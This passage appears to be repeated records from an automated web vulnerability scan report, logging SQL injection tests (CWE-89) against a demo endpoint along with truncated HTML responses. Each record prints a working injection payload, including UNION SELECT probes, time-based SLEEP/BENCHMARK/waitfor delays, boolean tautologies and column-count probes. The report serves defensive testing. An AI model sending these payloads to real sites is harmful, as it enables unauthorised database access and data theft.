href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1567\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1568\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1569\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1570\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' OR 'x'='x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1571Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1572\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SLEEP(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1573\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1574\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# SLEEP(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1575\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1576\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1577\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1578\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# );waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1579\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1580\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive 